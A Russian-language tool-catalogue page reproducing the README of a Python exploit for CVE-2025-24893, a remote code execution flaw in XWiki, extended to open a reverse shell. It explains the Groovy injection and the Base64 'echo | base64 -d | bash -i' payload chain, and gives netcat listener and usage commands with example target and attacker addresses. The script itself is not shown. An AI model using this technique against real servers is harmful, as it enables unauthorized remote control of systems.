Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
xwiki-15.10.8-reverse-shell-cve-2025-24893 — CVE-2025-24893 эксплойт RCE для XWiki с возможностью обратной оболочки | Kitploit
Инструменты/GitHubGitHub/bishben/xwiki-15.10.8-reverse-shell-cve-2025-24893
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubbishben/xwiki-15.10.8-reverse-shell-cve-2025-24893

xwiki-15.10.8-reverse-shell-cve-2025-24893

CVE-2025-24893 эксплойт RCE для XWiki с возможностью обратной оболочки

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
11 месяцев назадЕщё не проверено

CVE-2025-24893 Reverse Shell Эксплойт для XWiki

Отказ от ответственности: Данный скрипт предназначен только для образовательных целей и авторизованного тестирования безопасности. Не используйте его на системах, которыми вы не владеете или на тестирование которых у вас нет явного разрешения. Неправильное использование может быть незаконным и опасным.

Описание

Этот Python-скрипт эксплуатирует уязвимость CVE-2025-24893 — удаленное выполнение кода (RCE), затрагивающую XWiki версий до 15.10.10.

  • Протестированная версия: XWiki 15.10.8
  • Воздействие: Позволяет выполнять произвольные команды на целевом сервере.
  • Версия Python: Написан и протестирован на Python 3

Эта версия расширяет оригинальный PoC от Al Baradi Joy, добавляя возможность создания обратного шелла. Оригинальный PoC можно найти здесь.

Как это работает

  • XWiki выполняет Groovy-код через параметр URL.

  • Эксплойт внедряет команду bash -c в этот Groovy-шаблон.

  • Обычный обратный шелл содержит множество кавычек (' и "), которые нарушат вычисление Groovy и сам URL.

  • Чтобы решить эту проблему, скрипт кодирует однострочную шелл-команду в Base64.

  • Затем полезная нагрузка отправляется в URL и выполняется с помощью следующей цепочки:

    {echo,<base64>} | {base64,-d} | {bash,-i}

  • Это безопасно декодирует полезную нагрузку Base64 и выполняет её с помощью bash -i, предоставляя интерактивный обратный шелл.

Формат целевого URL

  • Формат: http://<target-host>
  • НЕ включайте:
    • Завершающий слеш / в конце
    • Путь /xwiki (скрипт добавляет его автоматически)

Примеры:

root@kitploit:~
# Правильно
http://10.129.95.114:8080
http://example.com:8080

# Неправильно
http://10.129.95.114:8080/         # завершающий слеш
http://example.com/xwiki            # содержит /xwiki

Настройка слушателя

Перед запуском эксплойта вы должны запустить слушателя на своей машине, чтобы принять обратный шелл.

Пример с использованием Netcat:

root@kitploit:~
nc -lvnp <lport>
  • <lport> должен совпадать с портом, который вы передаёте скрипту в качестве аргумента.

Использование

root@kitploit:~
python3 cve-2025-24893.py <target_base_url> <lhost> <lport>

Пример:

root@kitploit:~
python3 cve-2025-24893.py http://10.129.95.114:8080 10.0.0.5 4444
  • Скрипт выводит полный URL эксплойта, полезную нагрузку Base64 и инструкции по проверке слушателя.

Ссылки

  • Консультация GHSA
  • Домашняя страница XWiki
  • Оригинальный PoC от Al Baradi Joy

Благодарности

  • Оригинальное доказательство концепции: Al Baradi Joy
  • Эта версия: доработана для создания обратного шелла с интерактивным выполнением команд

Предупреждение

  • Используйте этот эксплойт только в контролируемых средах (HTB, лабораторные машины, ваши собственные ВМ).
  • Несанкционированное использование на публичных серверах незаконно и может повлечь уголовную ответственность.
Скачать инструмент